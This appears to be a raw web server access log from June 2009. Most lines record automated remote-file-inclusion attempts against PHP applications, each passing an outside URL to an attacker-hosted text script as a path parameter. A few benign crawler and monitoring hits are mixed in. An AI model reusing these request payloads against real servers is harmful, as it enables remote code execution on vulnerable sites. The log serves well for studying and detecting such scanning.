83.98.209.71 - - [19/Jun/2009:01:53:27 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:01:53:27 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:01:53:27 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:01:53:28 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:01:53:28 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:01:53:29 -0400] "GET /logs/access_log.Q109051800%20%20//appserv/main.php?appserv_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:01:53:29 -0400] "GET //appserv/main.php?appserv_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:01:53:29 -0400] "GET /logs//appserv/main.php?appserv_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:01:53:47 -0400] "GET /logs/access_log.Q109053100//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:01:53:51 -0400] "GET /logs/access_log.Q109053100//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:01:54:10 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=04_america&act=vote&no=17&page=&search_mode=&search_word=&cid=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:54:15 -0400] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:54:15 -0400] "GET /logs/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:54:21 -0400] "GET /logs/access_log.Q109052700%20%20/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:54:29 -0400] "GET /logs/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:54:32 -0400] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:54:33 -0400] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:54:33 -0400] "GET /logs/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:54:34 -0400] "GET /logs/access_log.Q109052700/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:01:55:17 -0400] "GET /logs/access_log.Q109050700%20%20//appserv/main.php?appserv_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:01:55:08 -0400] "GET /logs/error_log.Q109061600 HTTP/1.1" 200 3174227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [19/Jun/2009:01:55:27 -0400] "GET /images/nav_store_search_numb2.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
203.94.155.59 - - [19/Jun/2009:01:55:27 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Jun/2009:01:55:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.94.155.59 - - [19/Jun/2009:01:55:44 -0400] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:55:44 -0400] "GET /logs/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
121.189.59.237 - - [19/Jun/2009:01:55:49 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.189.59.237 - - [19/Jun/2009:01:55:49 -0400] "GET /logs/access_log.Q109060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
121.189.59.237 - - [19/Jun/2009:01:55:49 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:01:55:52 -0400] "GET /logs/access_log.Q109060200/errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:01:55:59 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:01:56:01 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:01:56:01 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:01:56:04 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:01:56:04 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:01:56:04 -0400] "GET /logs/access_log.Q109052900/felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:01:56:05 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:01:56:11 -0400] "GET /logs/access_log.Q109052900/felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:01:56:11 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:01:56:12 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:56:17 -0400] "GET /logs/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:56:17 -0400] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:01:56:21 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:01:56:21 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:01:56:21 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:56:24 -0400] "GET /logs/access_log.Q109051700/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
121.189.59.237 - - [19/Jun/2009:01:56:25 -0400] "GET /logs/access_log.Q109053000/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:01:56:36 -0400] "GET /errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:01:56:36 -0400] "GET /logs/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:01:56:37 -0400] "GET /logs/access_log.Q109052800/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:01:56:40 -0400] "GET /logs/access_log.Q109052800/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:01:56:40 -0400] "GET /errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:01:56:40 -0400] "GET /logs/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:56:41 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://125.163.251.219/har/fx29id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:01:56:44 -0400] "GET /logs/access_log.Q109051300/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:01:56:44 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:01:56:44 -0400] "GET /logs/access_log.Q109051300/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:01:56:44 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:01:56:44 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:01:57:03 -0400] "GET /logs/error_log.Q109061700 HTTP/1.1" 200 2209496 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.103.72.130 - - [19/Jun/2009:01:57:39 -0400] "GET /logs/access_log.Q109053100%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:01:57:53 -0400] "GET /logs/access_log.Q109052200/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:01:57:56 -0400] "GET /logs/access_log.Q109053100%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:58:30 -0400] "GET /logs/access_log.Q109051800/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:58:30 -0400] "GET /logs/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:58:33 -0400] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:01:58:42 -0400] "GET /logs/access_log.Q109060200/errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:58:53 -0400] "GET /logs/access_log.Q109052400/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:01:59:01 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:01:59:04 -0400] "GET /errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:01:59:04 -0400] "GET /logs/errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:01:59:06 -0400] "GET /logs/access_log.Q109051500%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:01:59:12 -0400] "GET /errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:01:59:12 -0400] "GET /logs/errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:01:59:12 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:01:59:13 -0400] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:01:59:13 -0400] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:59:22 -0400] "GET /logs/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:59:22 -0400] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:59:22 -0400] "GET /logs/access_log.Q109051700/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:01:58:59 -0400] "GET /logs/error_log.Q109061800 HTTP/1.1" 200 2820532 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.105.207.244 - - [19/Jun/2009:01:59:49 -0400] "GET /logs/access_log.Q109051700%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:02:00:18 -0400] "GET /logs/access_log.Q109031800/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
74.6.17.151 - - [19/Jun/2009:02:00:29 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.11.230.36 - - [19/Jun/2009:02:00:31 -0400] "GET /logs/includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
66.11.230.36 - - [19/Jun/2009:02:00:31 -0400] "GET /includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
66.11.230.36 - - [19/Jun/2009:02:00:31 -0400] "GET /logs/access_log.Q109050300/includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.6.17.151 - - [19/Jun/2009:02:00:29 -0400] "GET /images/ACE_EZ_PRP_sellsheet.pdf HTTP/1.0" 200 1064438 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.11.230.36 - - [19/Jun/2009:02:00:42 -0400] "GET /logs/access_log.Q109060800/includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:02:01:05 -0400] "GET /logs/access_log.Q109010700%20%20/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:02:01:11 -0400] "GET /logs/access_log.Q109060400%20%20/errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:01:11 -0400] "GET /logs/access_log.Q109052800%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:02:01:12 -0400] "GET /logs/access_log.Q109060400%20%20/errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.6.17.151 - - [19/Jun/2009:02:01:13 -0400] "GET /images/_notes/download_coming_soon.jpg.mno HTTP/1.0" 200 260 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
83.98.209.71 - - [19/Jun/2009:02:01:24 -0400] "GET /logs/access_log.Q109052800%20%20/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:02:00:54 -0400] "GET /logs/access_log.Q109061600 HTTP/1.1" 200 5728303 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.98.209.71 - - [19/Jun/2009:02:01:38 -0400] "GET /logs/access_log.Q109052800%20%20/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:02:01:40 -0400] "GET /logs/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:02:01:40 -0400] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:02:01:42 -0400] "GET /logs/access_log.Q109052700/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:01:57 -0400] "GET /logs/access_log.Q109051100%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:02:02 -0400] "GET /logs/access_log.Q109051300%20%20/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:02:02 -0400] "GET /logs/access_log.Q109051300%20%20/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:02:02:10 -0400] "GET /logs/access_log.Q109010700/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:02:02:29 -0400] "GET /logs/access_log.Q109052200%20%20/errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:02:02:33 -0400] "GET /logs/access_log.Q109052200%20%20/errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:02:02:37 -0400] "GET /logs/includes/class_item.php?fileExtension=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:02:02:37 -0400] "GET /includes/class_item.php?fileExtension=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:02:02:38 -0400] "GET /logs/access_log.Q109050300/includes/class_item.php?fileExtension=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:02:02:40 -0400] "GET /includes/class_item.php?fileExtension=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:02:02:40 -0400] "GET /logs/includes/class_item.php?fileExtension=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:02:02:43 -0400] "GET /includes/class_item.php?fileExtension=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:02:02:43 -0400] "GET /logs/includes/class_item.php?fileExtension=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:02:02:43 -0400] "GET /logs/access_log.Q109060800/includes/class_item.php?fileExtension=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:02:02:43 -0400] "GET /logs/access_log.Q109050300/includes/class_item.php?fileExtension=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.172.33.230 - - [19/Jun/2009:02:03:04 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
209.172.33.230 - - [19/Jun/2009:02:03:04 -0400] "GET /logs/access_log.Q109060900%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
